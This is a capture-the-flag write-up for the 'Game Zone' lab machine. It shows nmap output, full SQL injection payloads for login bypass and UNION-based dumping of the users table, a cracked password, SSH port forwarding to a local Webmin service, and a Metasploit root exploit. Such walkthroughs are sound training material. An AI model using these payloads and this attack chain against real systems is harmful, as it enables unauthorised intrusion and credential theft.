Game Zone

SQLi Initial Foothold - Reverse SSH tunneling PrivEsc

• Starting off with the nmap scan

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 61:ea:89:f1:d4:a7:dc:a5:50:f7:6d:89:c3:af:0b:03 (RSA)
|   256 b3:7d:72:46:1e:d3:41:b6:6a:91:15:16:c9:4a:a5:fa (ECDSA)
|_  256 53:67:09:dc:ff:fb:3a:3e:fb:fe:cf:d8:6d:41:27:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Game Zone

• The SSH service version doesn't seem to be vulnerable plus we don't have any valid credentials, So our only attack vector is port 80

• Visiting the http service we get a login page

• Tried some default credentials like admin:password, admininstrator:password and admin:admin - none of them worked !

• Now our only option is to try some boolean based Sqli payloads such as ' or 2=2 --

• Got redirected to another page called /portal.php

Since there was a space after my sqli payload => It confirms that the server in the backend is MySql

• There is another input field, which considers the user input and select the game name directly from the DB => Which makes it more vulnerable to SQLi, Inorder to exploit this let's trick the DB by inserting few SQL queries

' ORDER BY 1 --        # SQL error
' ORDER BY 2 --        # SQL error
' ORDER BY 3 --        # No error, confirms there are 3 rows

' UNION select 1, 2, 3 --

' union select 1,@@version,3 --

' UNION select 1, 2, table_name FROM information_schema.tables --
' UNION select 1, 2, column_name FROM information_schema.columns WHERE table_name = 'users' --
' UNION select 1, username, pwd FROM users --

agent47 : ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14

• On cracking this password we get videogamer124 - Now let's login as agent47 via SSH

Privilege Escalation

• The escalation vector is only via the Reverse SSH tunneling concept, So what is it ?

Reverse SSH tunneling or Reverse SSH port forwarding specifies that the given port on the remote server host is to be forwarded to the given host and port on the local side

Why are we doing this ?

• Let's assume if a site was blocked, we can forward the traffic to a server we own and view it via our localhost:<PORT>

What is SSH Tunnel, SSH Reverse Tunnel and SSH Port Forwarding?goteleport

• Let's enumerate what are all the services running on the box using ss or netstat

agent47@gamezone:~$ ss -tulpn
Netid  State      Recv-Q Send-Q           Local Address:Port                          Peer Address:Port              
udp    UNCONN     0      0                            *:10000                                    *:*                  
udp    UNCONN     0      0                            *:68                                       *:*                  
tcp    LISTEN     0      80                   127.0.0.1:3306                                     *:*                  
tcp    LISTEN     0      128                          *:10000                                    *:*                  
tcp    LISTEN     0      128                          *:22                                       *:*                  
tcp    LISTEN     0      128                         :::80                                      :::*                  
tcp    LISTEN     0      128                         :::22                                      :::*             

We can see that a service running on port 10000 is blocked via a firewall rule from the outside, Using an SSH Tunnel we can expose the port to us locally !

ssh -L 10000:127.0.0.1:10000 agent47@10.10.60.68

• Visiting our localhost:10000 gave us a Webmin portal - Tried agent47's credentials and we get in !

• We find the version for this webmin interface - Tried searching for some public exploits and luckily we had a metasploit one
• Set the options and run the exploit to get R00T :)